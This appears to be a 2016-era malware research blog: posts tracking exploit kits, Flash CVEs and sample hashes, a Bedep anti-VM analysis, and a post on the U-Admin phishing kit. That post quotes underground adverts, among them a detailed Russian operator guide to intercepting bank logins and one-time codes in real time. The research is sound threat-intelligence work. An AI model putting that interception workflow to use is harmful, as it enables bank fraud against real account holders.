is still around...But as mentioned earlier it's a One Actor operation since some time]Aside SadClowns and GooNky here are two other big (cf traffic volume) group which transition has not been covered already"WordsJS"  (named NTL/NTLR by RiskIQ) into Neutrino > CryptXXX U0000102016-06-10"ScriptJS" (Named DoublePar by RiskIQ and AfraidGate by PaloAlto) into Neutrino > CryptXXX U000011This gang  was historically dropping Necurs, then Locky Affid13 before going to CryptXXXIllustrating with a picture of words and some arrows:MISP : select documented EK pass with associated tags.1 arrow where you would have find Angler several days before.(+ SadClowns + GooNky not featured in that selection)With the recent 50 arrests tied to Lurk in mind and knowing the infection vector for Lurk was the "Indexm" variant of Angler between 2012 and beginning of 2016...we might think there is a connection and that some actors are stepping back.Another hint that this is probably not vacation "only" for Angler is that Neutrino changed its conditions on June 9th. From 880$ per week on shared server and 3.5k$ per month on dedicated, Neutrino doubled the price to 7k$ on dedicated only (no more per week work). Such move were seen in reaction to Blackhole's coder (Paunch) arrest in October 2013.So is this the End of Angler ? The pages to be written will tell us.“If a book is well written, I always find it too short.” ― Jane Austen, Sense and SensibilityPost publication notes:[2016-06-12]RIG : mentioned they were sill alive and would not change their Price.Maybe unrelated to RIG mention, Neutrino updated his thread as announced previously on underground but conditions are revisited :------Google translate:-----Tarif week on a shared server:Rent: $ 1500Limit: 100k hosts per dayOne-time daily discharge limits: $ 200Rate per month on a dedicated server:Rent: $ 4000Limits: 500k hosts per day, and more - on an individual basis.One-time daily discharge limits: $ 200----------------So now only price per week is doubled and month rate + ~20%[2016-06-13]Our exploit kit stats for the last two weeks… Angler dives, Neutrino soars.— News from the Lab (@FSLabs) June 13, 2016Acknowledgement:Thanks to Will Metcalf (Emerging Threats/Proofpoint) who made the replay of SadClowns' malvertising possible. Thanks to EKWatcher and Malc0de for their help on several points.Read More :XXX is Angler EK - 2015-12-21Russian hacker gang arrested over $25m theft - 2016-06-02 - BBC NewsNeutrino EK and CryptXXX - 2016-06-08 - ISCSansLurk Banker Trojan: Exclusively for Russia - 2016-06-10 - Securelist - KasperskyHow we helped to catch one of the most dangerous gangs of financial cybercriminals - 2016-08-30 - SecureList

CVE-2016-4117 (Flash up to and Exploit Kits

Saturday September 3rd, 2016 09:19:31 AM
Discovered being exploited in the wild by FireEye [1] on May 8, 2016, patched 4 days later with Flash, CVE-2016-4117 is making its way to Exploit Kits.Magnitude :CVE confirmed by FireEye - Thanks !On 2016-05-21 Magnitude is firing an exploit to Flash up to firing exploit to Flash - 2016-05-21For now i did not get exploitation in the different pass i tried but in the Flash exploit we can see some quite explicit imports : import com.adobe.tvsdk.mediacore.timeline.operations.DeleteRangeTimelineOperation;Magnitude Flash Exploit showing import of the DeleteRangeTimelineOperationSpotted sample :  f5cea58952ff30e9bd2a935f5843d15952b4cf85cdd1ad5d01c8de2000c48b0aFiddler sent here.Updates to come as it appears to be a work in progress.Neutrino :2016-05-23Spotted by Eset.2016-05-23 Neutrino successfully exploit CVE-2016-4117 on Flash and drop here CryptXXXSample in that pass : 30984accbf40f0920675f6ba0b6daf2a3b6d32c751fd6d673bddead2413170e8Fiddler sent here (Password is malware)Out of topic payload: 110891e2b7b992e238d4afbaa31e165a6e9c25de2aed442574d3993734fb5220 CryptXXXAngler EK:2016-05-23CVE identification by Henri Nurmi from F-Secure. Thanks !Angler EK successfully exploit Flash on 2016-05-23 dropping DridexSample in that pass : 310528e97a26f3fee05baea69230f8b619481ac53c2325da90345ae7713dcee2Fiddler sent hereOut of topic payload  : 99a6f5674b738591588416390f22dedd8dac9cf5aa14d0959208b0087b718902Most likely Dridex 123 targeting Germany based on distribution path.Sundown :  [3]2016-08-27Sample in that pass : cf6be39135d8663be5241229e0f6651f9195a7434202067616ae00712a4e34e6 Fiddler sent here  (password : malware)Read More:[1] CVE-2016-4117: Flash Zero-Day Exploited in the Wild - 2016-05-13 - Genwei Jiang - FireEye[2] New Flash Vulnerability CVE-2016-4117 Shares Similarities With Older Pawn Storm Exploit - 2016-05-13 - Moony Li - TrendMicro[3] Sundown EK – Stealing Its Way to the Top - 2016-09-02 - Spiderlabs

U-Admin (Universal Admin): A Phishing(Web&Android)/Grabber/ATS/Token kit

Tuesday May 17th, 2016 09:43:21 AM
Fallout Vault Boy maskThe goal of the post is to open-source data on a kit that has been seen live impersonating bank portal. This is mostly Raw data, few part only will be "google translated".On September 2015 the 16th,  an advert about a multipurpose kit appeared underground :------------------------------------------By: [Redacted]Subject : Инжекты | Админки | Фейки, -50% от рыночных цен -Доброе время суток всем.Рад предоставить свои услуги по разработке следующих проектов:Инжекты;Grabers 80-150$*;Pasive ATS 500-800$*;Active ATS 800-1500$*;Tooken Panels 400-800$*;Replacers 200-400$*;И многое другое...Фейки;Простые клоны 70-150$*;Продвинутые с перехватом 200-500$*;Админки на пхп;Под любые нужды ...*данные цены служат ориентиром. Реальная цена будет зависеть от каждого техзадания индивидуальноJabber( [Redacted] )ICQ( 6[Redacted]8 )------------------------------------------Google Translated as :------------------------------------------By: [Redacted]Subject: Inject | admin area | Fakes, -50% of the market price -Good time of day to all.I am glad to provide services for the development of the following projects:Inject;Grabers 80-150 $ *;Pasive ATS 500-800 $ *;Active ATS 800-1500 $ *;Tooken Panels 400-800 $ *;Replacers 200-400 $ *;And much more...fakes;Simple clones 70-150 $ *;Advanced interception $ 200-500 *;Admin Center on php;Under any needs ...* These prices are a guide. The actual price will depend on each individual ToRsJabber ([Redacted] @ (6[Redacted]8)------------------------------------------NB : The Subject became later :--Инжекты | Админки | Фейки | Android Инжекты, -50% от рыночных цен --Inject | admin area | fakes | Inject Android, 50% of the market price ---Seller later added :------------------------------------------Последее время очень мнoго вопросов по поводу как работает перехват на скам странице. Решил детально описать процес чтобы изначально не вводить клиентов в заблуждение.В самом начале надо понять что такое "СКАМ СТАНИЦА"."СКАМ СТРАНИЦА"- это копия реальной странички логина в банк ,которая находится на нашем сервере с похожем на банк доменом. Все детали вводимые на ней будут лететь к нам.Далее уже на выбор, или дание идут на емайл, или на специально сделанную админку.Тоесть суть замута такова:жертва попадает на нашу страницу ->вводит данные->потом наша страница кидает жертву обратно на оригинал ->и мы поже ипользуем данные сами чтобы войти..| Это самый примитивный пример , на самом деле все чуток сложнее и зависит от фантазии заказа .Дальше надо понять что такое "ПЕРЕХВАТ"."ПЕРЕХВАТ" - eто вид обмана, очень часто ипользуетса в инжектах. Само название говорит за себя.Инжект перехватывает дание в рельном времени и присылает нам . В это время жертва как обычно ждет с гиф на экране,а вы заходите вместо него.| Зачем это надо?Затем что если для перевода вам требуется дополнительно второй пароль/смс/тукен то можно это запросить ,пока жертва ждёт, через специально сделанные команды в админке.Основной бенефит что это можно делать повторно ,много раз.|| Перехват на скам страничке работать точно также . Жертвa вводить дание и ждет пока мы его спросим то что нам надо.|Поэтапно:Преставим себе что есть банк где на вход надо UserName и Password . На активацию перевода по IBAN надо нoмер с тукен-прибора (Pin1) и для переводa надо ввести номер в тукен-прибор и тукен-прибор даст нам номер обратно (Pin2)Теперь преставим себе что у нас есть скам странница на этот банк , которая будет отсылать нам получение даные для входа и потом покажет заставку жертве с просьбой подождать. Мы находимся на другом конце в админке и наблюдаем такую катину .Краткое пособие по админке."I'am Online"- показывает находится ли оператор в админке , если "Off-line" то все жертвы будут перенаправлены обратно на оригинал страницу.Колонка "Keys" это есть полученные детали для входа.Колонка "Pin" это для получених тукенов/пинов .Колонка "Task" для добавленья операции по запросу тукена/пинов .Колонка "Redirect" показывает релле редиректа конкретной жертвы . Если поставить "On" то жертва будет перенапрвлена на оригинал сразу.| *Если жертва мегает красним то это значит что жертва какраз ждет от вас комадуИ так , на даном этапе у нас есть логины для входа , и ждущий человвек на нашей странице .Входим, идем на активацию IBAN . Там нас спрашивает Pin1/Tooken1 .Мы идем обратно на админку и нажимаем запрос операции. У нас откроется окно с выбором операций .Нажимаем на "ask Pin1" и жертва видит вот это:Дальше все просто. Жертва вводить "pin1" и он приходит к нам на админку . А жертва в это время снова видит пред собой заставку "подождите" .Если пин подошол, идем на перевод и такимже способом просим "pin2". Важно понимать что это все можно повторять много раз и после неверного пина можно снова его запросить .Если залив ушол , ставим "Redirect" на "On" и юсер уходит на оригинал. Или в продвинутых системах можно показать ему техроботы и попросить зайти попоже.Вот и все!**Все тексты на английском по админке написаны с ошибками , я это знаю ).Делал очень быстро . Никак не дойдут руки сделать до конца ------------------------------------------On march 2016 the 9th :------------------------------------------доброе время суток всем.С великой радостью рад предложить свои услуги по разработке инжектов под мобильные устройства для многих публичных андроид ботов .Цены зависят от тех заданий .Пример роботы на один из UK линков можно посмотреть тут [REDACTED]pass:demoWith great joy, I am pleased to offer its services on developing injects for mobile devices for many public android bots.The prices depend on those jobs.An example of one of the injects on the UK link can be found here [REDACTED]pass:demo------------------------------------------Files mirrored here. (pass: demo)On march 2016 the 16th:------------------------------------------Ladie's and Gentlemen's.Don't miss out some fresh and well-designed mobile injects for UK.9 common links.Hight % success task.------------------------------------------On march 2016 the 31st:------------------------------------------Доброе время суток всем.Последним временем много клиентов задают одни и те же вопросы связаны с видео o работе перехвата на Нидерланды.Я решил более детально описать систему работы и поставить ее где-то в общедоступном месте.Прежде всего пару строчек хотел бы написать o админ панели. Oна называется Universal Admin. называется она не просто так Универсал,у нее реализована возможность поддерживать много разных проектов таких как: Tooken intercept,Text manager,Log parser,Drop manager и многое другое.[2 images here...not available at dump time]Не обращайте внимания на разные цвета и стили на Скринах ,стили меняются тоже прямо с админки.[1 image here...not available at dump time]Tо есть админ панель одна а плагинов под нее может быть много.Hа видео Вы видели эту админку с плагином Tooken intercept + Text manager.Text manager-это менеджер текстовых блоков и название кнопок, которые будут автоматически вставляется в вашы страницы,инжекты и фишинг сраницы.[1 images here...not available at dump time]Все что надо сделать для работы это создать текстовый блок с определенным ID ,потом на вашей странице создать элемент с этим же ID ивставить одну функцию в конец документа.Для примера: У вас есть инжект в котором есть определенная Легенда запроса дополнительной информации.Чтобы изменить эту Легенду вам как минимум надо разбираться в HTML и как максимум пересобирать конфигурацию бота.С помощью текстового менеджера в моей админке все что вам надо это поменять текст в определенном блоке и нажать сохранить.Tooken intercept- это собственно то о чем мы будем сейчас говорить.Не важно каким способом Вы стараетесь обмануть жертву (Injec ,phishing page) цель является добытие определенного пакета информации .Для примера скажем у вас есть Paypal Phishing page с помощью которой вы добывайте username и пароль. эти данные отсылаются куда-то наадминку в нашем случае это Universal Admin.Username и пароль это и есть тот самый пакет информации который после отправки формы сохраняются у вас ,а кокретно вот тут[1 image here...not available at dump time]Использовать эту информацию можно по-разному в зависимости от вашего проекта.Одним из методов использования этой информации является перехват(intercept) ,то есть использовать информацию в реальном времени прямо сейчас.Вы перехватили username и пароль и вместо жертвы попадаете на ак ,пока жертва ждет думая что страница грузится.В случае с PayPal использования перехвата не совсем обязательно, так как полученные пакет информации а именно username и пароль Выможете использовать и через неделю. Но в связи с тем что последнее время много контор используют One Time password(Tooken),которые действительны только 30 секунд, обойтись без Tooken interstep нереально. Tooken intercept дает вам возможность использовать тот самый пароль(tooken) на протяжении 30 секунд пока жертва ждет загрузки следующей страницы. Возьмем тот же PayPal. Скажем вы получили только что username и пароль, зашли внутрь, и на главной странице вам выскочила рамочка гдеговорится что для подтверждения вашей личности на ваш мобильный телефон был отправлен SMS с коротким кодом(Tooken) код который надо вести тam же в рамочкe.Код который был отправлен на мобильный телефон жертвы!!! жертва которая на данный момент находится на вашей странице(Phishing Inject)!!!там где только что она(жертва) ввела username и пароль, username и пароль те что пришли к вам на админку и те что вы использовали для тогочтобы зайти на тот самый аккаунт где вам выскочила рамочка!! В стандартных методах это называется запал и етот пакет информации можно выбросить. можно сделать такую же рамочку после логин этападля всех юзеров на нашей пишем фишинг или инжекте, но проблема в том что это рамочка показывается не всем и не всегда и если жертвена телефон ничего не приходило то он туда ничего никогда не ведет.Я думаю всем понятно что здесь нужна динамическая страница с дистанционным управлением. То есть вы должны принимать решения показыватьрамочку данной жертве или не показывать.Именно это и есть основа.Страница которая присоединена к нашей админке может меняться исходя из команд которые вы задаете в админке.Команд может быть много, но для этого в определенном месте в админке для каждой жертвы eсть список команд, которые можнозадать для данной страницы на которой он(жертвa) находится.[1 image here...not available at dump time]в нашем примитивном пример из PayPal в списке операции должнa присутствовать кнопка "показать рамочку".Если вы зашли на аккаунт с только что полученными данными и у вас выкидывает эту рамочку вы нажимаете кнопку "показать рамочку" для данной жертвой.И у нее на экране покажет такую же рамочку.Tooken, который будет введён в эту рамочку прилетит к вам на админ туда же где лежат username и пароль от этой жертвы.Думаю здесь все понятно.Единственное что хотел бы подчеркнуть то что жертва в любой момент может закрыть страницу закрыть компьютер вырубить сеть.В таком случае связь страницы с админкой теряется и задавать команды для данной страницы не имеет смысла.Для этого в нашей админке есть Tracker онлайн статуса который позволяет нам следить находится ли жертва онлайн или нет. [1 image here...not available at dump time]Теперь структура Tooken intercept админки.Первая страница это главная страница где показана текучка всех посетителей(жертв) ваших инжектов и фишингов.Напротив каждого посетителя есть кнопка O-Panel при нажатии на которую вы попадаете уже на индивидуальную панель операций для данного посетителя.[1 image here...not available at dump time] Именно здесь и находится список операций.Именно здесь крупным планом видно онлайн статус. Прошу заметить что онлайн статусов бывает 3(ONLINE, OFFLINE и WAITING).WAITING статус светится красным и светится только тогда когда жертва ждет операции от вас ,то есть только что вам был отправленпакет информации и страница ждет дальнейших инструкций!.[1 image here...not available at dump time]Также жертва с этим статусом мигает красным и на главной странице что поднимает их в таблице вверх. Окей давайте теперь возьмем реальный пример Phishing страницы скажем одного из нидерландских банков. тут реализованные как PCтак и мобильная версия.[1 image here...not available at dump time]Вы делаете рассылку на email и линки могут открываться на мобильном. в основном 50% так и происходит.Скажем кто-то(жертвa) переходит на Линк в вашем email и попадает на нашу страницу. Вы об этом узнаете сразу через Jabber Alert,в котором будет говориться про нового посетителя.Самое время открыть Universal панель. там вы увидите Новую колонку с информацией про посетителя а Конкретно его айпи ширина экрана и многое другое[1 image here...not available at dump time]с минуты на минуту к нам прилетят логины, их можно ждать как на главной так и на O-Panel.после того как Вы получили логины, Посетитель уходит в режим ожидания. об этом Вам будут говорить красные мигающие панели, она экранe у жертвы будет примерно такое[1 image here...not available at dump time]Что делать вам с полученным пакетом Логинов Решать только Вам. Но если у вас, находясь внутри в аккаунте, попросят ввести tooken, пароль, SMS пароль то самое время вернуться на O-Panel и нажать соответствующую команду. Команда которая приведет к тому что страница на которой находится жертва покажет ему запрос того что вам надо.[1 image here...not available at dump time]После того как жертва ввела в форму Tooken ,она снова уходит в режим ожидания, и Вы снова должны определиться что делать и какую команду ему дать. И так до бесконечности или пока жертва не Закроет страницу. Но если все-таки это надоест вам то у васесть два варианта распрощаться жертвой. это поставить блок [1 image here...not available at dump time]или перенаправить его на оригинал страницу.[1 image here...not available at dump time]При работе с одним посетителем могут стучать другие новые.Это будет отвлекать и все новые посетители будут ждать. чтобы этого избежать на главной странице есть ричашки которые контролируютрегистрацию новых посетителей и переадресацию старых поголовно. Если поставить регистрацию OFF ,то в админке только будут работать Те кто уже Там есть, все новые будут попадать на оригинал страницы контор.A если поставить редирект всех ,то все посетители(жертвы) кто есть в админке будут перенаправлены на свои оригинальные страницы поголовно.Это надо делать когда вы собрались к примеру уходить.------------------------------------------On april 2016 the 4th:------------------------------------------увжаемые друзьяновые инжекты под Андроид------------------------------------------On april 2016 the 11th:------------------------------------------Продается Пак инжектов под андроид для сбора карт.WhatsUpFacebookInstagramViberSkaypGooglePlayPrice:450$user posted imageОбезательно посмотрите видео. В инжектах реализованы Responsive & animations приемы.[Redacted]pass:1qaz------------------------------------------File mirrored here (pass : 1qaz)On april 2016 the 12th:------------------------------------------Pack of Injects for Columbia banks for sale.Credit cards colectors with admin panel on https domen.bancofalabellarbmcolombiacolpatriabancolombiabbvanetbancodeoccidentebancodebogotabancopichinchaPrice:800$[3 images here...not available at dump time]Video: [Redacted]Pass:columbia ------------------------------------------File mirrored here  (pass: columbia)On april 2016 the 14th:------------------------------------------Pack of Injects for Canada banks for sale.Credit cards colectors with admin panel on https domen.TdCibcBmoDesjRbcPrice:500$[3 images here...not available at dump time]Video: [Redacted]Pass:canada ------------------------------------------File mirrored here (pass: canada)On april 2016 the 18th:------------------------------------------Недавно вышел апдейт на U-admin(Universal Admin).Теперь все более соответствует написанному выше описанием.Админ панель теперь имеют специальную директорию под plugins, и все плагины в этой директории автоматически прописывается в админке.[1 image here...not available at dump time]Например, вы приобрели U-admin а потом "Log parser Plugin". Для этого вам просто надо поставить папку Log parser в плагин директорию в админке.Также был разработан VNC плагин который дает возможность коннектится к вашему botnet API с запросом на соединение по VNC/SOCKS для определенного бота.Этот плагин является дополнением к "Tooken Intercept" плагина про который я писал вам выше. Если вы используете "Tooken Intercept" с инжектороми в вашем боте есть в VNC, и в админке вашего Бота есть API управление VNC то при наличии VLC plugin в U-admin возможно сделать запрос на соединение по vnc или socks с ботом.Как правило это делается автоматически при самом первом соединение с инжектоm,то есть когда жертва заходит на страницу перехвата.В связи с этим была слегка переделана O-Panel где в команды была добавлена новая опция проверки статуса VNC/SOCKS соединение.[1 image here...not available at dump time]Куда ,как вы видите, при успешном соединении выводятся данные на VNC/SOCKS------------------------------------------File Tree from some components :Folder PATH listingUADMIN_|   cp.php|   head.php|   index.php|   login.php|   session.php|  +---files|   |   animate.css|   |   bootbox.min.js|   |   bootstrap-notify.min.js|   |   bootstrap-social.css|   |   hover-min.css|   |   index.php|   |   jquery-ui.css|   |   jquery-ui.min.js|   |   jquery.js|   |   my.css|   |  |   +---bootstrap|   |   +---css|   |   |       bootstrap-theme.css|   |   ||   |   |       bootstrap-theme.min.css|   |   ||   |   |       bootstrap.css|   |   ||   |   |       bootstrap.min.css|   |   ||   |   |      |   |   +---fonts|   |   |       glyphicons-halflings-regular.eot|   |   |       glyphicons-halflings-regular.svg|   |   |       glyphicons-halflings-regular.ttf|   |   |       glyphicons-halflings-regular.woff|   |   |       glyphicons-halflings-regular.woff2|   |   |      |   |   +---js|   |   |       bootstrap.js|   |   |       bootstrap.min.js|   |   |       npm.js|   |   |      |   |   \---switch|   |           bootstrap-switch.min.css|   |           bootstrap-switch.min.js|   |          |   +---dt|   |       dataTables.bootstrap.min.css|   |       dataTables.bootstrap.min.js|   |       jquery.dataTables.min.js|   |      |   \---images|           ui-icons_444444_256x240.png|           ui-icons_555555_256x240.png|           ui-icons_777620_256x240.png|           ui-icons_777777_256x240.png|           ui-icons_cc0000_256x240.png|           ui-icons_ffffff_256x240.png|          +---opt|       geo_switch.txt|       index.php|       theme.txt|      +---plugins|   +---intercept|   |   |   bc.php|   |   |   class.jabber.php|   |   |   dynamic__part.php|   |   |   functions.php|   |   |   gate.php|   |   |   head.php|   |   |   index.php|   |   |   main.php|   |   |   panel.php|   |   |   text.php|   |   |  |   |   +---ajax|   |   |       cp_ajax.php|   |   |       index.php|   |   |      |   |   +---files|   |   |   |   animate.css|   |   |   |   bootbox.min.js|   |   |   |   bootstrap-notify.min.js|   |   |   |   bootstrap-social.css|   |   |   |   hover-min.css|   |   |   |   index.php|   |   |   |   jquery-ui.css|   |   |   |   jquery-ui.min.js|   |   |   |   jquery.js|   |   |   |   my.css|   |   |   |  |   |   |   +---bootstrap|   |   |   |   +---css|   |   |   |   |       bootstrap-theme.css|   |   |   |   ||   |   |   |   |       bootstrap-theme.min.css|   |   |   |   ||   |   |   |   |       bootstrap.css|   |   |   |   ||   |   |   |   |       bootstrap.min.css|   |   |   |   ||   |   |   |   |      |   |   |   |   +---fonts|   |   |   |   |       glyphicons-halflings-regular.eot|   |   |   |   |       glyphicons-halflings-regular.svg|   |   |   |   |       glyphicons-halflings-regular.ttf|   |   |   |   |       glyphicons-halflings-regular.woff|   |   |   |   |       glyphicons-halflings-regular.woff2|   |   |   |   |      |   |   |   |   +---js|   |   |   |   |       bootstrap.js|   |   |   |   |       bootstrap.min.js|   |   |   |   |       npm.js|   |   |   |   |      |   |   |   |   \---switch|   |   |   |           bootstrap-switch.min.css|   |   |   |           bootstrap-switch.min.js|   |   |   |          |   |   |   +---dt|   |   |   |       dataTables.bootstrap.min.css|   |   |   |       dataTables.bootstrap.min.js|   |   |   |       jquery.dataTables.min.js|   |   |   |      |   |   |   \---images|   |   |           ui-icons_444444_256x240.png|   |   |           ui-icons_555555_256x240.png|   |   |           ui-icons_777620_256x240.png|   |   |           ui-icons_777777_256x240.png|   |   |           ui-icons_cc0000_256x240.png|   |   |           ui-icons_ffffff_256x240.png|   |   |          |   |   \---public|   |           .ht.db|   |           index.php|   |           Removed.txt|   |          |   +---log_parser|   |   |   functions.php|   |   |   gate.php|   |   |   head.php|   |   |   index.php|   |   |   main.php|   |   |  |   |   +---ajax|   |   |       server_side.php|   |   |       ssp.class.php|   |   |      |   |   +---classes|   |   |       browser.php|   |   |      |   |   +---files|   |   |   |   animate.css|   |   |   |   bootbox.min.js|   |   |   |   bootstrap-notify.min.js|   |   |   |   bootstrap-social.css|   |   |   |   hover-min.css|   |   |   |   jquery-ui.min.js|   |   |   |   jquery.js|   |   |   |   my.css|   |   |   |  |   |   |   +---bootstrap|   |   |   |   +---css|   |   |   |   |       bootstrap-theme.css|   |   |   |   ||   |   |   |   |       bootstrap-theme.min.css|   |   |   |   ||   |   |   |   |       bootstrap.css|   |   |   |   ||   |   |   |   |       bootstrap.min.css|   |   |   |   ||   |   |   |   |      |   |   |   |   +---fonts|   |   |   |   |       glyphicons-halflings-regular.eot|   |   |   |   |       glyphicons-halflings-regular.svg|   |   |   |   |       glyphicons-halflings-regular.ttf|   |   |   |   |       glyphicons-halflings-regular.woff|   |   |   |   |       glyphicons-halflings-regular.woff2|   |   |   |   |      |   |   |   |   +---js|   |   |   |   |       bootstrap.js|   |   |   |   |       bootstrap.min.js|   |   |   |   |       npm.js|   |   |   |   |      |   |   |   |   \---switch|   |   |   |           bootstrap-switch.min.css|   |   |   |           bootstrap-switch.min.js|   |   |   |          |   |   |   \---dt|   |   |           dataTables.bootstrap.min.css|   |   |           dataTables.bootstrap.min.js|   |   |           jquery.dataTables.min.js|   |   |          |   |   \---public|   |           .htBd.db|   |           geo_switch.txt|   |           index.php|   |           theme.txt|   |          |   +---settings|   |   |   functions.php|   |   |   index.php|   |   |   main.php|   |   |  |   |   \---public|   |           cfg.php|   |           index.php|   |          |   +---style|   |   |   functions.php|   |   |   index.php|   |   |   main.php|   |   |  |   |   \---public|   |           index.php|   |          |   \---text|       |   functions.php|       |   main.php|       |   text.php|       |  |       \---public|               index.php|               texts.txt|              \---scrNote: If you are interested by the [Redacted] part please send a mail

Bedep has raised its game vs Bot Zombies

Sunday January 21st, 2018 10:39:22 PM
Simulacra & Simulation - Jean BaudrillardFeatured in MatrixBedep could be described as a fileless loader with a resident module that can optionally perform AdFraud. It's intimate to Angler EK and appeared around August 2014. On the 2016-03-24 I noticed several move in Bedep. Angler infecting a VM and integrating it into an instance of Bedep botnet2016-03-24No more variable in the URI (as several month before), the protocol Key changed and in most of my manual checks, all threads were sending a strange payload in the first stream.2ko size for Win7 64bits :80eb8a6aba5e6e70fb6c4032242e9ae82ce305d656b4ed8b629b24e1df0aef9aPopup shown by the first payload from Bedep Stream - Win7(in the background Angler Landing)48ko size for WinXP 32bits:a0fe4139133ddb62e6db8608696ecdaf5ea6ca79b5e049371a93a83cbcc8e780Popup shown by the first payload from Bedep Stream - WinXPLooking at my traffic I thought for some time that one of the Bedep instances was split in two.Then I understood that I got different result on my "manually" driven VM (on VMWare ESXi) and my automated Cuckoo driven one ( on VirtualBox). I suspected it was related to hardening, as this is one of the main difference between those two systems.And I got confirmation. Here is an example on a GooNky ([1] [2] [3]) malvertising traffic in Australia :A VM not hardened enough against Bedep got redirected to a "decoy" instance of Bedep that i will refer as :Bedep "Robot Town" - 2016-04-12Now look what i get instead with a VM that is not spotted as is:Same Angler thread - VM not detected. 1st Stream get Vawtrak2016-04-12( Vawtrak in that stream   d24674f2f9879ee9cec3eeb49185d4ea6bf555d150b4e840407051192eda1d61 )I am not skilled enough to give you the list of checks Bedep is doing. But here is one of them spotted by Cuckoo :Bedep doing some ACPI checksI think there are multiple level of checks. Some resulting in Bedep not trying to contact the C&C, some where the positive check end up with a different seed for the Bedep DGA redirecting spotted machines in a dedicated instance. This is quite powerful :- the checks are made without dropping an executable. - if you don't know what to expect it's quite difficult to figure out that you have been trapped- there is a lot of things that operators can do with this list of known bots and initial Bedep thread ID. One of them is for instance knowing which of the infection path are researcher/bots "highway" :Illustration for Bedep "Robot Town" from an "infection path" focused point of viewThis could be just a move to perform different tasks (AdFraud only (?) ) on VMs, but my guess it that this Bedep evolution on 2016-03-24 is a fast reaction to this Proofpoint Blog from 2016-03-18 which  show how Bedep threads are additional connectable dots. Sharing publicly is often a difficult decision. The question is which side will benefits the most from it, in the long time.For researchers:In the last 3 weeks, if your VM have communicated with : (which is a Bedep ip from end of 2015 reused) || (  && http.uri.path  "ads.php?sid=1901" ) and you are interested by the "real payload" then you might want to give PAfish a run.Marvin - Paranoid AndroidOn the other hand, any of your VM which has communicated with (Bedep "standard" 18xx 19xx instance)  since the 24 of March is hardened enough to grab the real payload.[Edits]- Removed the AU focused mention on the Vawtrak. I have been told (Thanks ! ) it's US focused. Got geo Glitched. Maybe more about that a day or the other.- Refine the check conditions for Researcher. IP and sid=1901...otherwise...ok :)[/Edits]Acknowledgements :Thanks Will Metcalf and Malc0de for the discussions and help on this topic--I'm sorry, but I must do it...Greetings to Angler and Bedep guys. 😉 You are keeping us busy...and awake !Reading :Video Malvertising Bringing New Risks to High-Profile Sites - 2016-03-18 - ProofpointBedep’s DGA: Trading Foreign Exchange for Malware Domains - 2015-04-21 - Dennis Schwarz - ArborSertAngler EK : now capable of "fileless" infection (memory malware) - 2014-08-30Modifying VirtualBox settings for malware analysis - 2012-08-23  - Mikael Keri

CVE-2016-1019 (Flash up to and Exploit Kits

Thursday May 5th, 2016 06:01:55 AM
Spotted in a "degraded" version on the 2016-04-02 in Magnitude, live also since 2016-03-31 in Nuclear Pack, Adobe was really fast at fixing  this vulnerability with the patch released on the 2016-04-07 bringing Flash Player to version's not the first time a "0day" exploit is being used in a "degraded" state.This happened before with Angler and CVE-2015-0310 and CVE-2014-8439You'll find more details about the finding on that Proofpoint blog here :"Killing a zero-day in the egg: Adobe CVE-2016-1019"and on that FireEye blog here:CVE-2016-1019: A new flash exploit included in Magnitude Exploit KitNote : we worked with Eset, Kaspersky and Microsoft as well on this case.Nuclear Pack :2016-03-31 "Degraded"Identification by  Eset, Kaspersky and FireEye (Thanks)Exploit sent to Flash Player by Nuclear Pack on the 2016-03-31CVE-2016-1019 insideSample in that pass:  301f163644a525155d5e8fe643b07dceac19014620a362d6db4dded65d9cad90Out of topic example of payload dropped that day by that instance of Nuclear : 42904b23cff35cc3b87045f21f82ba8b (locky)Note the string "CVE-2016-1001" in the Nuclear Pack, explaining why maybe this exploit is being used in a degraded state.CVE-2016-1001 string spotted by Denis O'Brien (Malwageddon), the 2016-04-05 in Nuclear Pack exploitMagnitude :2016-04-02 "Degraded" to as is by FireEye[2016-04-07: TrendMicro told me they found some hits for this exploit in Magnitude back from 2016-03-31 as well]Magnitude exploiting Flash with CVE-2016-1019 the 2016-04-02 in the morning.Payload is Cerber.Side note : the check on the redirector in front of Magnitude ( ) which might have been fixed with the CVE-2015-2413 was in Magnitude landing itself from September to end of November 2015.res:// onload check features unobfuscated at that time in Magnitude Landing 2015-09-29Sample in that pass: 0a664526d00493d711ee93662a693eb724ffece3cd68c85df75e1b6757febde5Out of topic payload: 9d92fb315830ba69162bb7c39c45b219cb8399dd4e2ca00a1e21a5457f92fb3c Cerber RansomwareNote: I got successful pass with Windows 8.1 and Flash as well and Windows 10 build 1511 (feb 2016) via Flash on Internet Explorer 11. Edge seems not being served a landing.Neutrino:2016-04-11 - "degraded" as well it seems. (at least didn't got it to work on Flash 21.x)CVE id by @binjo and Anton Ivanov (Kaspersky)Neutrino successfully exploit Flash with CVE-2016-10192016-04-11Fiddler : Sent to vtOut of topic payload: 83de3f72cc44215539a23d1408c140ae325b05f77f2528dbad375e975c18b82e Reading :Killing a zero day in the egg : CVE-2016-1019 - 2016-04-07 - ProofpointCVE-2016-1019: A new flash exploit included in Magnitude Exploit Kit - 2016-04-07 -  Genwei Jiang - FireEyeZero-Day Attack Discovered in Magnitude Exploit Kit Targeting CVE-2016-1019 in Older Versions of Adobe Flash Player - 2016-04-07 - Peter Pi, Brooks Li and Joseph C. Chen - TrendMicro

CVE-2016-1001 (Flash up to and Exploit Kits

Monday April 4th, 2016 11:05:56 PM
Two weeks after Flash patch,  two months after last Flash exploit integration in Angler, on the 2016-03-25 Angler EK, in some threads, is starting to send an exploit to Flash Player and tried multiple configuration but I was not able to get exploited. The following day I got successful infections with Flash and EK :2016-03-25The CVE here has been identificated as CVE-2016-1001 by Eset and Kaspersky (Thanks)2016-03-26 - Angler EK successfully exploiting Flash in Internet Explorer 11 on Windows 7Fiddler sent to VT here.Hash of the associated SWF fwiw : b609ece7b9f4977bed792421b33b15daObserved as well : ab24d05f731caa4c87055af050f26917 - c4c59f454e53f1e45858e95e25f64d07NB : this is just "one" pass.  Angler EK can be used to spread whatever its customers want to spread .Selected examples I saw in the last 4 days : Teslacrypt (ID 20, 40,52, 74 ,47) , Locky (affid 14 - 7f2b678398a93cac285312354ce7d2b7  and affid 11 - f417b107339b79a49e4e63e116e84a32), GootKit b9bec4a5811c6aff6001efa357f1f99c, Vawtrak  0dc4d5370bc4b0c8333b9512d686946cRamnit 99f21ba5b02b3085c683ea831d79dc79Gozi ISFB (DGA nasa) 11d515c2a2135ca00398b88eebbf9299BandarChor, (several instances, ex f97395004053aa28cadc6d4dc7fc0464 - 3c9b5868b4121a2d48b980a81dda8569 )Graybird/LatentBot 